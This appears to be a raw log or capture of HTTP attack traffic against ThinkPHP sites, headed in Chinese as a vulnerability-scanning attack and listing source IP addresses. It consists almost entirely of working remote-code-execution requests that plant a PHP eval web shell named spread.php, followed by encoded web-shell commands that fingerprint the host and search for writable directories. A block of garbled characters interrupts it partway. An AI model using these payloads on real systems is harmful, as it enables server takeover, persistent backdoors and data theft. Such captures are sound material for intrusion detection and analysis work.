利用ThinkPHP漏洞扫描攻击
115.238.244.112 119.3.90.139 94.191.10.105
POST /index.php/?s=captcha HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)
Content-Length: 172
_method=construct&filter[]=assert&filter[]=file_put_contents('spread.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUW3NwcmVhZF0pOz8+'))&server=-1<?php @eval($_POST[spread]);?>
POST /index.php/?s=captcha HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)
Content-Length: 183
Cookie: _f8a26=http://10.42.19.31:10000
_method=__construct&filter[]=file_put_contents('spread.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUW3NwcmVhZF0pOz8+'))&method=get&server[REQUEST_METHOD]=<?php @eval($_POST[spread]);?>
POST /spread.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)
Content-Length: 988
spread=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%22SB360%22%3Becho%20%40asenc(%24output)%3Becho%20%22SB360%22%3B%7Dob_start()%3Btry%7B%24D%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3Bif(%24D%3D%3D%22%22)%24D%3Ddirname(%24_SERVER%5B%22PATH_TRANSLATED%22%5D)%3B%24R%3D%22%7B%24D%7D%7C%22%3Bif(substr(%24D%2C0%2C1)!%3D%22%2F%22)%7Bforeach(range(%22C%22%2C%22Z%22)as%20%24L)if(is_dir(%22%7B%24L%7D%3A%22))%24R.%3D%22%7B%24L%7D%3A%22%3B%7Delse%7B%24R.%3D%22%2F%22%3B%7D%24R.%3D%22%09%22%3B%24u%3D(function_exists(%22posix_getegid%22))%3F%40posix_getpwuid(%40posix_geteuid())%3A%22%22%3B%24s%3D(%24u)%3F%24u%5B%22name%22%5D%3A%40get_current_user()%3B%24R.%3Dphp_uname()%3B%24R.%3D%22%7C%7B%24s%7D%22%3Becho%20%24R%3B%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B
POST /spread.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)
Content-Length: 1717
Cookie: _f8a26=http://10.42.163.158:10000
spread=%40eval%2F%2A%15%99%D0%21%03%19s%20%0B%CB%A8%DD%E3%A3%C5%C4%BB%C5%CE%2A%2F%01%28%24%7B%27%5FP%27.%27OST%27%7D%5Bz9%5D%2F%2A%A0%9B%3F%C0%9A%3F%E0%99%3F%20%99%E3%2A%2F%01%28%24%7B%27%5FPOS%27.%27T%27%7D%5Bz0%5D%29%29%3B&z0=ODQzMTQzO0Bpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7QHNldF9tYWdpY19xdW90ZXNfcnVudGltZSgwKTtlY2hvKCItPnwiKTskR0xPQkFMU1snSSddPTA7JEdMT0JBTFNbJ0QnXT1pc3NldCgkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddKT8kX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddOihpc3NldCgkX1NFUlZFUlsnQVBQTF9QSFlTSUNBTF9QQVRIJ10pP3RyaW0oJF9TRVJWRVJbJ0FQUExfUEhZU0lDQUxfUEFUSCddLCJcXCIpOihpc3NldCgkX1snUEFUSF9UUkFOU0xBVEVEJ10pP3N0cl9yZXBsYWNlKCRfU0VSVkVSWyJQSFBfU0VMRiJdKTpzdHJfcmVwbGFjZShzdHJfcmVwbGFjZSgiLyIsIlxcIixpc3NldCgkX1NFUlZFUlsiUEhQX1NFTEYiXSk%2FJF9TRVJWRVJbIlBIUF9TRUxGIl06KGlzc2V0KCRfU0VSVkVSWyJVUkwiXSk%2FJF9TRVJWRVJbIlVSTCJdOiRfU0VSVkVSWyJTQ1JJUFRfTkFNRSJdKSksIiIsaXNzZXQoJF9TRVJWRVJbIlBBVEhfVFJBTlNMQVRFRCJdKT8kX1NFUlZFUlsiUEFUSF9UUkFOU0xBVEVEIl06JF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKSkpO0JMKCRHTE9CQUxTWydEJ10sMCk7ZnVuY3Rpb24gQkwoJFAsJE4pe2lmKGlzX2ZpbGUoJFApfHwkR0xPQkFMU1snSSddPj0kX1BPU1RbInoyIl0pcmV0dXJuOyRKPWJhc2VuYW1lKCRQKTtpZigkUD09JEdMT0JBTFNbJ0QnXSkkSj0iKiI7aWYoc3RyaXBvcygifHwiLCJ8Ii4kSi4ifCIpPT09RkFMU0UpRFcoJFApOyRBPUBvcGVuZGlyKCRQKTtpZigkQSE9TlVMTCl7d2hpbGUoJEI9QHJlYWRkaXIoJEEpKXtpZigkQiE9Ii4iJiYkQiE9Ii4uIikkRT0kUC4iLyIuJEI7aWYoQGlzX2RpcigkRSkmJiROPCRfUE9TVFsiejMiXSlCTCgkRSwkTisxKTt9QGNsb3NlZGlyKCRBKTt9fWZ1bmN0aW9uIERXKCRIKSB7JE49InRtcC50bXAiO2lmKGlzX2RpcigkSCkpe2lmKEBmd3JpdGUoQGZvcGVuKCIkSC8kTiIsICd3JyksInRtcCIpKXtAdW5saW5rKCIkSC8kTiIpO2VjaG8gc3RyX3JlcGxhY2UoIlxcIiwiLyIsJEgpLiJ8IjskR0xPQkFMU1snSSddPSRHTE9CQUxTWydJJ10rMTt9fX1lY2hvKCJ8PC0iKTtkaWUoKTs%3D&z9=BaSE64%5FdEcOdE&z2=1&z3=100
GET /public/index.php?s=index/%5Cthink%5CContainer/invokefunction&function=call_user_func_array&vars%5B0%5D=file_put_contents&vars%5B1%5D%5B%5D=spread.php&vars%5B1%5D%5B1%5D=%3C?php%20@eval($_POST%5Bspread%5D);?%3E HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)
GET /public/index.php?s=index/%5Cthink%5CRequest/input&cacheFile=spread.php&content=%3C?php%20@eval($_POST%5Bspread%5D);?%3E HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)
GET /public/index.php?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=file_put_contents&vars%5B1%5D%5B%5D=spread.php&vars%5B1%5D%5B%5D=%3C?php%20@eval($_POST%5Bspread%5D);?%3E HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)
�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������GET /public/index.php?s=index/%5Cthink%5CContainer/invokefunction&function=call_user_func_array&vars%5B0%5D=file_put_contents&vars%5B1%5D%5B%5D=spread.php&vars%5B1%5D%5B%5D=%3C?php%20@eval($_POST%5Bspread%5D);?%3E HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)
GET /public/index.php?s=index/%5Cthink%5Cview%5Cdriver%5CPhp/display&cacheFile=spread.php&content=%3C?php%20@eval($_POST%5Bspread%5D);?%3E HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)